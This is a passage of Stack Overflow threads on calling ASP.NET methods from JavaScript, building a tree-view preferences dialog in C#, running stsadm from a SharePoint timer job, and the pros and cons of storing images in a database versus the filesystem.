WITHIN GROUP (ORDER BY response_time)
FROM pageviews;
Source: http://www.craigkerstiens.com/2014/02/02/Examining-PostgreSQL-9.4/
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3682",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: Call ASP.NET function from JavaScript? I'm writing a web page in ASP.NET. I have some JavaScript code, and I have a submit button with a click event.
Is it possible to call a method I created in ASP with JavaScript's click event?
A: Well, if you don't want to do it using Ajax or any other way and just want a normal ASP.NET postback to happen, here is how you do it (without using any other libraries):
It is a little tricky though... :)
i. In your code file (assuming you are using C# and .NET 2.0 or later) add the following Interface to your Page class to make it look like
public partial class Default : System.Web.UI.Page, IPostBackEventHandler{}
ii. This should add (using Tab-Tab) this function to your code file:
public void RaisePostBackEvent(string eventArgument) { }
iii. In your onclick event in JavaScript, write the following code:
var pageId = '<%= Page.ClientID %>';
__doPostBack(pageId, argumentString);
This will call the 'RaisePostBackEvent' method in your code file with the 'eventArgument' as the 'argumentString' you passed from the JavaScript. Now, you can call any other event you like.
P.S: That is 'underscore-underscore-doPostBack' ... And, there should be no space in that sequence... Somehow the WMD does not allow me to write to underscores followed by a character!
A: The __doPostBack() method works well.
Another solution (very hackish) is to simply add an invisible ASP button in your markup and click it with a JavaScript method.
<div style="display: none;">
<asp:Button runat="server" ... OnClick="ButtonClickHandlerMethod" />
</div>
From your JavaScript, retrieve the reference to the button using its ClientID and then call the .click() method on it.
var button = document.getElementById(/* button client id */);
button.click();
A: I think blog post How to fetch & show SQL Server database data in ASP.NET page using Ajax (jQuery) will help you.
JavaScript Code
<script src="http://code.jquery.com/jquery-3.3.1.js" />
<script language="javascript" type="text/javascript">
function GetCompanies() {
$("#UpdatePanel").html("<div style='text-align:center; background-color:yellow; border:1px solid red; padding:3px; width:200px'>Please Wait...</div>");
$.ajax({
type: "POST",
url: "Default.aspx/GetCompanies",
data: "{}",
dataType: "json",
contentType: "application/json; charset=utf-8",
success: OnSuccess,
error: OnError
});
}
function OnSuccess(data) {
var TableContent = "<table border='0'>" +
"<tr>" +
"<td>Rank</td>" +
"<td>Company Name</td>" +
"<td>Revenue</td>" +
"<td>Industry</td>" +
"</tr>";
for (var i = 0; i < data.d.length; i++) {
TableContent += "<tr>" +
"<td>"+ data.d[i].Rank +"</td>" +
"<td>"+data.d[i].CompanyName+"</td>" +
"<td>"+data.d[i].Revenue+"</td>" +
"<td>"+data.d[i].Industry+"</td>" +
"</tr>";
}
TableContent += "</table>";
$("#UpdatePanel").html(TableContent);
}
function OnError(data) {
}
</script>
ASP.NET Server Side Function
[WebMethod]
[ScriptMethod(ResponseFormat= ResponseFormat.Json)]
public static List<TopCompany> GetCompanies()
{
System.Threading.Thread.Sleep(5000);
List<TopCompany> allCompany = new List<TopCompany>();
using (MyDatabaseEntities dc = new MyDatabaseEntities())
{
allCompany = dc.TopCompanies.ToList();
}
return allCompany;
}
A: Static, strongly-typed programming has always felt very natural to me, so at first I resisted learning JavaScript (not to mention HTML and CSS) when I had to build web-based front-ends for my applications. I would do anything to work around this like redirecting to a page just to perform and action on the OnLoad event, as long as I could code pure C#.
You will find however that if you are going to be working with websites, you must have an open mind and start thinking more web-oriented (that is, don't try to do client-side things on the server and vice-versa). I love ASP.NET webforms and still use it (as well as MVC), but I will say that by trying to make things simpler and hiding the separation of client and server it can confuse newcomers and actually end up making things more difficult at times.
My advice is to learn some basic JavaScript (how to register events, retrieve DOM objects, manipulate CSS, etc.) and you will find web programming much more enjoyable (not to mention easier). A lot of people mentioned different Ajax libraries, but I didn't see any actual Ajax examples, so here it goes. (If you are not familiar with Ajax, all it is, is making an asynchronous HTTP request to refresh content (or perhaps perform a server-side action in your scenario) without reloading the entire page or doing a full postback.
Client-Side:
<script type="text/javascript">
var xmlhttp = new XMLHttpRequest(); // Create object that will make the request
xmlhttp.open("GET", "http://example.org/api/service", "true"); // configure object (method, URL, async)
xmlhttp.send(); // Send request
xmlhttp.onstatereadychange = function() { // Register a function to run when the state changes, if the request has finished and the stats code is 200 (OK). Write result to <p>
if (xmlhttp.readyState == 4 && xmlhttp.statsCode == 200) {
document.getElementById("resultText").innerHTML = xmlhttp.responseText;
}
};
</script>
That's it. Although the name can be misleading the result can be in plain text or JSON as well, you are not limited to XML. jQuery provides an even simpler interface for making Ajax calls (among simplifying other JavaScript tasks).
The request can be an HTTP-POST or HTTP-GET and does not have to be to a webpage, but you can post to any service that listens for HTTP requests such as a RESTful API. The ASP.NET MVC 4 Web API makes setting up the server-side web service to handle the request a breeze as well. But many people do not know that you can also add API controllers to web forms project and use them to handle Ajax calls like this.
Server-Side:
public class DataController : ApiController
{
public HttpResponseMessage<string[]> Get()
{
HttpResponseMessage<string[]> response = new HttpResponseMessage<string[]>(
Repository.Get(true),
new MediaTypeHeaderValue("application/json")
);
return response;
}
}
Global.asax
Then just register the HTTP route in your Global.asax file, so ASP.NET will know how to direct the request.
void Application_Start(object sender, EventArgs e)
{
RouteTable.Routes.MapHttpRoute("Service", "api/{controller}/{id}");
}
With AJAX and Controllers, you can post back to the server at any time asynchronously to perform any server side operation. This one-two punch provides both the flexibility of JavaScript and the power the C# / ASP.NET, giving the people visiting your site a better overall experience. Without sacrificing anything, you get the best of both worlds.
References
*
*Ajax,
*jQuery Ajax,
*Controller in Webforms
A:
The Microsoft AJAX library will accomplish this. You could also create your own solution that involves using AJAX to call your own aspx (as basically) script files to run .NET functions.
This is the library called AjaxPro which was written an MVP named Michael Schwarz. This was library was not written by Microsoft.
I have used AjaxPro extensively, and it is a very nice library, that I would recommend for simple callbacks to the server. It does function well with the Microsoft version of Ajax with no issues. However, I would note, with how easy Microsoft has made Ajax, I would only use it if really necessary. It takes a lot of JavaScript to do some really complicated functionality that you get from Microsoft by just dropping it into an update panel.
A: It is so easy for both scenarios (that is, synchronous/asynchronous) if you want to trigger a server-side event handler, for example, Button's click event.
For triggering an event handler of a control:
If you added a ScriptManager on your page already then skip step 1.
*
*Add the following in your page client script section
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
*Write you server side event handler for your control
protected void btnSayHello_Click(object sender, EventArgs e)
{
Label1.Text = "Hello World...";
}
*Add a client function to call the server side event handler
function SayHello() {
__doPostBack("btnSayHello", "");
}
Replace the "btnSayHello" in code above with your control's client id.
By doing so, if your control is inside an update panel, the page will not refresh. That is so easy.
One other thing to say is that: Be careful with client id, because it depends on you ID-generation policy defined with the ClientIDMode property.
A:
I'm trying to implement this but it's not working right. The page is
posting back, but my code isn't getting executed. When i debug the
page, the RaisePostBackEvent never gets fired. One thing i did
differently is I'm doing this in a user control instead of an aspx
page.
If anyone else is like Merk, and having trouble over coming this, I have a solution:
When you have a user control, it seems you must also create the PostBackEventHandler in the parent page. And then you can invoke the user control's PostBackEventHandler by calling it directly. See below:
public void RaisePostBackEvent(string _arg)
{
UserControlID.RaisePostBackEvent(_arg);
}
Where UserControlID is the ID you gave the user control on the parent page when you nested it in the mark up.
Note: You can also simply just call methods belonging to that user control directly (in which case, you would only need the RaisePostBackEvent handler in the parent page):
public void RaisePostBackEvent(string _arg)
{
UserControlID.method1();
UserControlID.method2();
}
A: The Microsoft AJAX library will accomplish this. You could also create your own solution that involves using AJAX to call your own aspx (as basically) script files to run .NET functions.
I suggest the Microsoft AJAX library. Once installed and referenced, you just add a line in your page load or init:
Ajax.Utility.RegisterTypeForAjax(GetType(YOURPAGECLASSNAME))
Then you can do things like:
<Ajax.AjaxMethod()> _
Public Function Get5() AS Integer
Return 5
End Function
Then, you can call it on your page as:
PageClassName.Get5(javascriptCallbackFunction);
The last parameter of your function call must be the javascript callback function that will be executed when the AJAX request is returned.
A: You can do it asynchronously using .NET Ajax PageMethods. See here or here.
A: You might want to create a web service for your common methods.
Just add a WebMethodAttribute over the functions you want to call, and that's about it.
Having a web service with all your common stuff also makes the system easier to maintain.
A: If the __doPostBack function is not generated on the page you need to insert a control to force it like this:
<asp:Button ID="btnJavascript" runat="server" UseSubmitBehavior="false" />
A: Regarding:
var button = document.getElementById(/* Button client id */);
button.click();
It should be like:
var button = document.getElementById('<%=formID.ClientID%>');
Where formID is the ASP.NET control ID in the .aspx file.
A: Add this line to page load if you are getting object expected error.
ClientScript.GetPostBackEventReference(this, "");
A: You can use PageMethods.Your C# method Name in order to access C# methods or VB.NET methods into JavaScript.
A: Try this:
if(!ClientScript.IsStartupScriptRegistered("window"))
{
Page.ClientScript.RegisterStartupScript(this.GetType(), "window", "pop();", true);
}
Or this
Response.Write("<script>alert('Hello World');</script>");
Use the OnClientClick property of the button to call JavaScript functions...
A: You can also get it by just adding this line in your JavaScript code:
document.getElementById('<%=btnName.ClientID%>').click()
I think this one is very much easy!
A: Please try this:
<%= Page.ClientScript.GetPostBackEventReference(ddlVoucherType, String.Empty) %>;
ddlVoucherType is a control which the selected index change will call... And you can put any function on the selected index change of this control.
A: The simplest and best way to achieve this is to use the onmouseup() JavaScript event rather than onclick()
That way you will fire JavaScript after you click and it won't interfere with the ASP OnClick() event.
A: I try this and so I could run an Asp.Net method while using jQuery.
*
*Do a page redirect in your jQuery code
window.location = "Page.aspx?key=1";
*Then use a Query String in Page Load
protected void Page_Load(object sender, EventArgs e)
{
if (Request.QueryString["key"] != null)
{
string key= Request.QueryString["key"];
if (key=="1")
{
// Some code
}
}
}
So no need to run an extra code
A: This reply works like a breeze for me thanks cross browser:
The __doPostBack() method works well.
Another solution (very hackish) is to simply add an invisible ASP button in your markup and click it with a JavaScript method.
<div style="display: none;">
<asp:Button runat="server" ... OnClick="ButtonClickHandlerMethod" />
</div>
From your JavaScript, retrieve the reference to the button using its ClientID and then call the .Click() method on it:
var button = document.getElementByID(/* button client id */);
button.Click();
Blockquote
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "146"
} |
Q: How to create a tree-view preferences dialog type of interface in C#? I'm writing an application that is basically just a preferences dialog, much like the tree-view preferences dialog that Visual Studio itself uses. The function of the application is simply a pass-through for data from a serial device to a file. It performs many, many transformations on the data before writing it to the file, so the GUI for the application is simply all the settings that dictate what those transformations should be.
What's the best way to go about designing/coding a tree-view preferences dialog? The way I've been going about it is building the main window with a docked tree control on the left. Then I have been creating container controls that correspond to each node of the tree. When a node is selected, the app brings that node's corresponding container control to the front, moves it to the right position, and maximizes it in the main window. This seems really, really clunky while designing it. It basically means I have tons of container controls beyond the edge of the main window during design time that I have to keep scrolling the main window over to in order to work with them. I don't know if this totally makes sense the way I'm writing this, but maybe this visual for what I'm talking about will make more sense:
Basically I have to work with this huge form, with container controls all over the place, and then do a bunch of run-time reformatting to make it all work. This seems like a lot of extra work. Am I doing this in a totally stupid way? Is there some "obvious" easier way of doing this that I'm missing?
A: Greg Hurlman wrote:
Why not just show/hide the proper container when a node is selected in the grid? Have the containers all sized appropriately in the same spot, and hide all but the default, which would be preselected in the grid on load.
Unfortunately, that's what I'm trying to avoid. I'm looking for an easy way to handle the interface during design time, with minimal reformatting code needed to get it working during run time.
I like Duncan's answer because it means the design of each node's interface can be kept completely separate. This means I don't get overlap on the snapping guidelines and other design time advantages.
A: A tidier way is to create separate forms for each 'pane' and, in each form constructor, set
this.TopLevel = false;
this.FormBorderStyle = FormBorderStyle.None;
this.Dock = DockStyle.Fill;
That way, each of these forms can be laid out in its own designer, instantiated one or more times at runtime, and added to the empty area like a normal control.
Perhaps the main form could use a SplitContainer with a static TreeView in one panel, and space to add these forms in the other. Once they are added, they could be flipped through using Hide/Show or BringToFront/SendToBack methods.
SeparateForm f = new SeparateForm();
MainFormSplitContainer.Panel2.Controls.Add(f);
f.Show();
A: I would probably create several panel classes based on a base class inheriting CustomControl. These controls would then have methods like Save/Load and stuff like that. If so I can design each of these panels separately.
I have used a Wizard control that in design mode, handled several pages, so that one could click next in the designer and design all the pages at once through the designer. Though this had several disadvantages when connecting code to the controls, it probably means that you could have a similar setup by building some designer classes. I have never myself written any designer classes in VS, so I can't say how to or if its worth it :-)
I'm a little curious of how you intend to handle the load/save of values to/from the controls? There must be a lot of code in one class if all your pages are in one big Form?
And yet another way would of course be to generate the gui code as each page is requested, using info about what type of settings there are.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3725",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Sharepoint: executing stsadm from a timer job + SHAREPOINT\System rights I have an unusual situation in which I need a SharePoint timer job to both have local administrator windows privileges and to have SHAREPOINT\System SharePoint privileges.
I can get the windows privileges by simply configuring the timer service to use an account which is a member of local administrators. I understand that this is not a good solution since it gives SharePoint timer service more rights then it is supposed to have. But it at least allows my SharePoint timer job to run stsadm.
Another problem with running the timer service under local administrator is that this user won't necessarily have SHAREPOINT\System SharePoint privileges which I also need for this SharePoint job. It turns out that SPSecurity.RunWithElevatedPrivileges won't work in this case. Reflector shows that RunWithElevatedPrivileges checks if the current process is owstimer (the service process which runs SharePoint jobs) and performs no elevation this is the case (the rational here, I guess, is that the timer service is supposed to run under NT AUTHORITY\NetworkService windows account which which has SHAREPOINT\System SharePoint privileges, and thus there's no need to elevate privileges for a timer job).
The only possible solution here seems to be to run the timer service under its usual NetworkService windows account and to run stsadm as a local administrator by storing the administrator credentials somewhere and passing them to System.Diagnostics.Process.Run() trough the StarInfo's Username, domain and password.
It seems everything should work now, but here is another problem I'm stuck with at the moment. Stsamd is failing with the following error popup (!) (Winternals filemon shows that stsadm is running under the administrator in this case):
The application failed to initialize properly (0x0c0000142).
Click OK to terminate the application.
Event Viewer registers nothing except the popup.
The local administrator user is my account and when I just run stsadm interactively under this account everything is ok. It also works fine when I configure the timer service to run under this account.
Any suggestions are appreciated :)
A: I'm not at work so this is off the top of my head, but: If you get a reference to the Site, can you try to create a new SPSite with the SYSTEM-UserToken?
SPUserToken sut = thisSite.RootWeb.AllUsers["SHAREPOINT\SYSTEM"].UserToken;
using (SPSite syssite = new SPSite(thisSite.Url,sut)
{
// Do what you have to do
}
A: Other applications if run this way (i.e. from a timer job with explicit credentials) are failing the same way with "The application failed to initialize propely". I just worte a simple app which takes a path of another executable and its arguments as parameres and when run from that timer job it fails the same way.
internal class ExternalProcess
{
public static void run(String executablePath, String workingDirectory, String programArguments, String domain, String userName,
String password, out Int32 exitCode, out String output)
{
Process process = new Process();
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
StringBuilder outputString = new StringBuilder();
Object synchObj = new object();
DataReceivedEventHandler outputAppender =
delegate(Object sender, DataReceivedEventArgs args)
{
lock (synchObj)
{
outputString.AppendLine(args.Data);
}
};
process.OutputDataReceived += outputAppender;
process.ErrorDataReceived += outputAppender;
process.StartInfo.FileName = @"C:\AppRunner.exe";
process.StartInfo.WorkingDirectory = workingDirectory;
process.StartInfo.Arguments = @"""" + executablePath + @""" " + programArguments;
process.StartInfo.UserName = userName;
process.StartInfo.Domain = domain;
SecureString passwordString = new SecureString();
foreach (Char c in password)
{
passwordString.AppendChar(c);
}
process.StartInfo.Password = passwordString;
process.Start();
process.BeginOutputReadLine();
process.BeginErrorReadLine();
process.WaitForExit();
exitCode = process.ExitCode;
output = outputString.ToString();
}
}
AppRunner basically does the same as the above fragment, but without username and password
A: The SharePoint Timer jobs runs with the SharePoint Firm Admin credentials since, the information get into the SharePoint Config Database. Thus the application pool will not have the access.
For testing the timer job in dev environment, we can temporarily change the application pool account to the application pool account being used for Central Administration.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3739",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Storing Images in DB - Yea or Nay? So I'm using an app that stores images heavily in the DB. What's your outlook on this? I'm more of a type to store the location in the filesystem, than store it directly in the DB.
What do you think are the pros/cons?
A: File store. Facebook engineers had a great talk about it. One take away was to know the practical limit of files in a directory.
Needle in a Haystack: Efficient Storage of Billions of Photos
A: I'm not sure how much of a "real world" example this is, but I currently have an application out there that stores details for a trading card game, including the images for the cards. Granted the record count for the database is only 2851 records to date, but given the fact that certain cards have are released multiple times and have alternate artwork, it was actually more efficient sizewise to scan the "primary square" of the artwork and then dynamically generate the border and miscellaneous effects for the card when requested.
The original creator of this image library created a data access class that renders the image based on the request, and it does it quite fast for viewing and individual card.
This also eases deployment/updates when new cards are released, instead of zipping up an entire folder of images and sending those down the pipe and ensuring the proper folder structure is created, I simply update the database and have the user download it again. This currently sizes up to 56MB, which isn't great, but I'm working on an incremental update feature for future releases. In addition, there is a "no images" version of the application that allows those over dial-up to get the application without the download delay.
This solution has worked great to date since the application itself is targeted as a single instance on the desktop. There is a web site where all of this data is archived for online access, but I would in no way use the same solution for this. I agree the file access would be preferable because it would scale better to the frequency and volume of requests being made for the images.
Hopefully this isn't too much babble, but I saw the topic and wanted to provide some my insights from a relatively successful small/medium scale application.
A: SQL Server 2008 offers a solution that has the best of both worlds : The filestream data type.
Manage it like a regular table and have the performance of the file system.
A: It depends on the number of images you are going to store and also their sizes. I have used databases to store images in the past and my experience has been fairly good.
IMO, Pros of using database to store images are,
A. You don't need FS structure to hold your images
B. Database indexes perform better than FS trees when more number of items are to be stored
C. Smartly tuned database perform good job at caching the query results
D. Backups are simple. It also works well if you have replication set up and content is delivered from a server near to user. In such cases, explicit synchronization is not required.
If your images are going to be small (say < 64k) and the storage engine of your db supports inline (in record) BLOBs, it improves performance further as no indirection is required (Locality of reference is achieved).
Storing images may be a bad idea when you are dealing with small number of huge sized images. Another problem with storing images in db is that, metadata like creation, modification dates must handled by your application.
A: I have recently created a PHP/MySQL app which stores PDFs/Word files in a MySQL table (as big as 40MB per file so far).
Pros:
*
*Uploaded files are replicated to backup server along with everything else, no separate backup strategy is needed (peace of mind).
*Setting up the web server is slightly simpler because I don't need to have an uploads/ folder and tell all my applications where it is.
*I get to use transactions for edits to improve data integrity - I don't have to worry about orphaned and missing files
Cons:
*
*mysqldump now takes a looooong time because there is 500MB of file data in one of the tables.
*Overall not very memory/cpu efficient when compared to filesystem
I'd call my implementation a success, it takes care of backup requirements and simplifies the layout of the project. The performance is fine for the 20-30 people who use the app.
A: Im my experience I had to manage both situations: images stored in database and images on the file system with path stored in db.
The first solution, images in database, is somewhat "cleaner" as your data access layer will have to deal only with database objects; but this is good only when you have to deal with low numbers.
Obviously database access performance when you deal with binary large objects is degrading, and the database dimensions will grow a lot, causing again performance loss... and normally database space is much more expensive than file system space.
On the other hand having large binary objects stored in file system will cause you to have backup plans that have to consider both database and file system, and this can be an issue for some systems.
Another reason to go for file system is when you have to share your images data (or sounds, video, whatever) with third party access: in this days I'm developing a web app that uses images that have to be accessed from "outside" my web farm in such a way that a database access to retrieve binary data is simply impossible. So sometimes there are also design considerations that will drive you to a choice.
Consider also, when making this choice, if you have to deal with permission and authentication when accessing binary objects: these requisites normally can be solved in an easier way when data are stored in db.
A: This might be a bit of a long shot, but if you're using (or planning on using) SQL Server 2008 I'd recommend having a look at the new FileStream data type.
FileStream solves most of the problems around storing the files in the DB:
*
*The Blobs are actually stored as files in a folder.
*The Blobs can be accessed using either a database connection or over the filesystem.
*Backups are integrated.
*Migration "just works".
However SQL's "Transparent Data Encryption" does not encrypt FileStream objects, so if that is a consideration, you may be better off just storing them as varbinary.
From the MSDN Article:
Transact-SQL statements can insert, update, query, search, and back up FILESTREAM data. Win32 file system interfaces provide streaming access to the data.
FILESTREAM uses the NT system cache for caching file data. This helps reduce any effect that FILESTREAM data might have on Database Engine performance. The SQL Server buffer pool is not used; therefore, this memory is available for query processing.
A: I once worked on an image processing application. We stored the uploaded images in a directory that was something like /images/[today's date]/[id number]. But we also extracted the metadata (exif data) from the images and stored that in the database, along with a timestamp and such.
A: In a previous project i stored images on the filesystem, and that caused a lot of headaches with backups, replication, and the filesystem getting out of sync with the database.
In my latest project i'm storing images in the database, and caching them on the filesystem, and it works really well. I've had no problems so far.
A: File paths in the DB is definitely the way to go - I've heard story after story from customers with TB of images that it became a nightmare trying to store any significant amount of images in a DB - the performance hit alone is too much.
A: I'm in charge of some applications that manage many TB of images. We've found that storing file paths in the database to be best.
There are a couple of issues:
*
*database storage is usually more expensive than file system storage
*you can super-accelerate file system access with standard off the shelf products
*
*for example, many web servers use the operating system's sendfile() system call to asynchronously send a file directly from the file system to the network interface. Images stored in a database don't benefit from this optimization.
*things like web servers, etc, need no special coding or processing to access images in the file system
*databases win out where transactional integrity between the image and metadata are important.
*
*it is more complex to manage integrity between db metadata and file system data
*it is difficult (within the context of a web application) to guarantee data has been flushed to disk on the filesystem
A: In my experience, sometimes the simplest solution is to name the images according to the primary key. So it's easy to find the image that belongs to a particular record, and vice versa. But at the same time you're not storing anything about the image in the database.
A: The trick here is to not become a zealot.
One thing to note here is that no one in the pro file system camp has listed a particular file system. Does this mean that everything from FAT16 to ZFS handily beats every database?
No.
The truth is that many databases beat many files systems, even when we're only talking about raw speed.
The correct course of action is to make the right decision for your precise scenario, and to do that, you'll need some numbers and some use case estimates.
A: In places where you MUST guarantee referential integrity and ACID compliance, storing images in the database is required.
You cannot transactionaly guarantee that the image and the meta-data about that image stored in the database refer to the same file. In other words, it is impossible to guarantee that the file on the filesystem is only ever altered at the same time and in the same transaction as the metadata.
A: Second the recommendation on file paths. I've worked on a couple of projects that needed to manage large-ish asset collections, and any attempts to store things directly in the DB resulted in pain and frustration long-term.
The only real "pro" I can think of regarding storing them in the DB is the potential for easy of individual image assets. If there are no file paths to use, and all images are streamed straight out of the DB, there's no danger of a user finding files they shouldn't have access to.
That seems like it would be better solved with an intermediary script pulling data from a web-inaccessible file store, though. So the DB storage isn't REALLY necessary.
A: The word on the street is that unless you are a database vendor trying to prove that your database can do it (like, let's say Microsoft boasting about Terraserver storing a bajillion images in SQL Server) it's not a very good idea. When the alternative - storing images on file servers and paths in the database is so much easier, why bother? Blob fields are kind of like the off-road capabilities of SUVs - most people don't use them, those who do usually get in trouble, and then there are those who do, but only for the fun of it.
A: Storing an image in the database still means that the image data ends up somewhere in the file system but obscured so that you cannot access it directly.
+ves:
*
*database integrity
*its easy to manage since you don't have to worry about keeping the filesystem in sync when an image is added or deleted
-ves:
*
*performance penalty -- a database lookup is usually slower that a filesystem lookup
*you cannot edit the image directly (crop, resize)
Both methods are common and practiced. Have a look at the advantages and disadvantages. Either way, you'll have to think about how to overcome the disadvantages. Storing in database usually means tweaking database parameters and implement some kind of caching. Using filesystem requires you to find some way of keeping filesystem+database in sync.
A: As others have said SQL 2008 comes with a Filestream type that allows you to store a filename or identifier as a pointer in the db and automatically stores the image on your filesystem which is a great scenario.
If you're on an older database, then I'd say that if you're storing it as blob data, then you're really not going to get anything out of the database in the way of searching features, so it's probably best to store an address on a filesystem, and store the image that way.
That way you also save space on your filesystem, as you are only going to save the exact amount of space, or even compacted space on the filesystem.
Also, you could decide to save with some structure or elements that allow you to browse the raw images in your filesystem without any db hits, or transfer the files in bulk to another system, hard drive, S3 or another scenario - updating the location in your program, but keep the structure, again without much of a hit trying to bring the images out of your db when trying to increase storage.
Probably, it would also allow you to throw some caching element, based on commonly hit image urls into your web engine/program, so you're saving yourself there as well.
A: Small static images (not more than a couple of megs) that are not frequently edited, should be stored in the database. This method has several benefits including easier portability (images are transferred with the database), easier backup/restore (images are backed up with the database) and better scalability (a file system folder with thousands of little thumbnail files sounds like a scalability nightmare to me).
Serving up images from a database is easy, just implement an http handler that serves the byte array returned from the DB server as a binary stream.
A: Here's an interesting white paper on the topic.
To BLOB or Not To BLOB: Large Object Storage in a Database or a Filesystem
The answer is "It depends." Certainly it would depend upon the database server and its approach to blob storage. It also depends on the type of data being stored in blobs, as well as how that data is to be accessed.
Smaller sized files can be efficiently stored and delivered using the database as the storage mechanism. Larger files would probably be best stored using the file system, especially if they will be modified/updated often. (blob fragmentation becomes an issue in regards to performance.)
Here's an additional point to keep in mind. One of the reasons supporting the use of a database to store the blobs is ACID compliance. However, the approach that the testers used in the white paper, (Bulk Logged option of SQL Server,) which doubled SQL Server throughput, effectively changed the 'D' in ACID to a 'd,' as the blob data was not logged with the initial writes for the transaction. Therefore, if full ACID compliance is an important requirement for your system, halve the SQL Server throughput figures for database writes when comparing file I/O to database blob I/O.
A: One thing that I haven't seen anyone mention yet but is definitely worth noting is that there are issues associated with storing large amounts of images in most filesystems too. For example if you take the approach mentioned above and name each image file after the primary key, on most filesystems you will run into issues if you try to put all of the images in one big directory once you reach a very large number of images (e.g. in the hundreds of thousands or millions).
Once common solution to this is to hash them out into a balanced tree of subdirectories.
A: Something nobody has mentioned is that the DB guarantees atomic actions, transactional integrity and deals with concurrency. Even referentially integrity is out of the window with a filesystem - so how do you know your file names are really still correct?
If you have your images in a file-system and someone is reading the file as you're writing a new version or even deleting the file - what happens?
We use blobs because they're easier to manage (backup, replication, transfer) too. They work well for us.
A: The problem with storing only filepaths to images in a database is that the database's integrity can no longer be forced.
If the actual image pointed to by the filepath becomes unavailable, the database unwittingly has an integrity error.
Given that the images are the actual data being sought after, and that they can be managed easier (the images won't suddenly disappear) in one integrated database rather than having to interface with some kind of filesystem (if the filesystem is independently accessed, the images MIGHT suddenly "disappear"), I'd go for storing them directly as a BLOB or such.
A: I'm the lead developer on an enterprise document management system in which some customers store hundreds of gigabytes of documents. Terabytes in the not too distant future. We use the file system approach for many of the reasons mentioned on this page plus another: archiving.
Many of our customers must conform to industry specific archival rules, such as storage to optical disk or storage in a non-proprietary format. Plus, you have the flexibility of simply adding more disks to a NAS device. If you have your files stored in your database, even with SQL Server 2008's file stream data type, your archival options just became a whole lot narrower.
A: At a company where I used to work we stored 155 million images in an Oracle 8i (then 9i) database. 7.5TB worth.
A: As with most issues, it's not as simple as it sounds. There are cases where it would make sense to store the images in the database.
*
*You are storing images that are
changing dynamically, say invoices and you wanted
to get an invoice as it was on 1 Jan
2007?
*The government wants you to maintain 6 years of history
*Images stored in the database do not require a different backup strategy. Images stored on filesystem do
*It is easier to control access to the images if they are in a database. Idle admins can access any folder on disk. It takes a really determined admin to go snooping in a database to extract the images
On the other hand there are problems associated
*
*Require additional code to extract
and stream the images
*Latency may be
slower than direct file access
*Heavier load on the database server
A: Normally, I'm storngly against taking the most expensive and hardest to scale part of your infrastructure (the database) and putting all load into it. On the other hand: It greatly simplifies backup strategy, especially when you have multiple web servers and need to somehow keep the data synchronized.
Like most other things, It depends on the expected size and Budget.
A: We have implemented a document imaging system that stores all it's images in SQL2005 blob fields. There are several hundred GB at the moment and we are seeing excellent response times and little or no performance degradation. In addition, fr regulatory compliance, we have a middleware layer that archives newly posted documents to an optical jukebox system which exposes them as a standard NTFS file system.
We've been very pleased with the results, particularly with respect to:
*
*Ease of Replication and Backup
*Ability to easily implement a document versioning system
A: If this is web-based application then there could be advantages to storing the images on a third-party storage delivery network, such as Amazon's S3 or the Nirvanix platform.
A: Assumption: Application is web enabled/web based
I'm surprised no one has really mentioned this ... delegate it out to others who are specialists -> use a 3rd party image/file hosting provider.
Store your files on a paid online service like
*
*Amazon S3
*Moso Cloud Storage
Another StackOverflow threads talking about this here.
This thread explains why you should use a 3rd party hosting provider.
It's so worth it. They store it efficiently. No bandwith getting uploaded from your servers to client requests, etc.
A: If you're not on SQL Server 2008 and you have some solid reasons for putting specific image files in the database, then you could take the "both" approach and use the file system as a temporary cache and use the database as the master repository.
For example, your business logic can check if an image file exists on disc before serving it up, retrieving from the database when necessary. This buys you the capability of multiple web servers and fewer sync issues.
A: Your web-server (I'm assuming you are using one) is designed to handle images while a database is not. Thus I would vote heavily on the nay side.
Store just the path (and maybe file info too) in the database.
A: I would personally store the large data outside of the database.
Pros: Stores everything in one please, easy access to data files, easy baskup
Cons: Decreases database performance, many page splits, possible database coruption
A: The only reason we store images in our tables is because each table (or set of tables per range of work) is temporary and dropped at the end of the workflow. If there was any sort of long term storage we'd definitely opt for storing file paths.
It should also be noted that we work with a client/server application internally so there's no web interface to worry about.
A: If you need to store lots of images on the file system a couple of things to think about include:
*
*Backup and restore. How do you keep the images in sync.
*Filesystem performance. Depends on what you are doing and the filesystem, but you may want to implement a hashing mechanism so that you don't have a single directory with billions of files.
*Replication. Do you need to keep the files in sync between multiple servers?
A: As someone mentioned already, "it depends". If storage in a database is supposed to be a 1-to-1 fancy replacement for filesystem, it may not be quite a best option.
However, if a database backend will provide additional values, not only a serialization and storage of a blob, then it may make a real sense.
You may take a look at WKT Raster which is a project aiming at developing raster support in PostGIS which in turn serves as a geospatial extension for PostgreSQL database system. Idea behind the WKT Raster is not only to define a format for raster serialization and storage (using PostgreSQL system), but, what's much more important than storage, is to specify database-side efficient image processing accessible from SQL. Long story short, the idea is to move the operational weight from client to database backend, so it take places as close to storage itself as possible. The WKT Raster, as PostGIS, is dedicate to applications of specific domain, GIS.
For more complete overview, check the website and presentation (PDF) of the system.
A: Attempting to mimic a file system using SQL is generally a bad plan. You ultimately write less code with equal or better results if you stick with the file system for external storage.
A: Pulling loads of binary data out of your DB over the wire is going to cause huge latency issues and won't scale well.
Store paths in the DB and let your webserver take the load - it's what it was designed for!
A: File system, for sure. Then you get to use all of the OS functionality to deal with these images - back ups, webserver, even just scripting batch changes using tools like imagemagic. If you store them in the DB then you'll need to write your own code to solve these problems.
A: One thing you need to keep in mind is the size of your data set. I believe that Dillie-O was the only one who even remotely hit the point.
If you have a small, single user, consumer app then I would say DB. I have a DVD management app that uses the file system (in Program Files at that) and it is a PIA to backup. I wish EVERY time that they would store them in a db, and let me choose where to save that file.
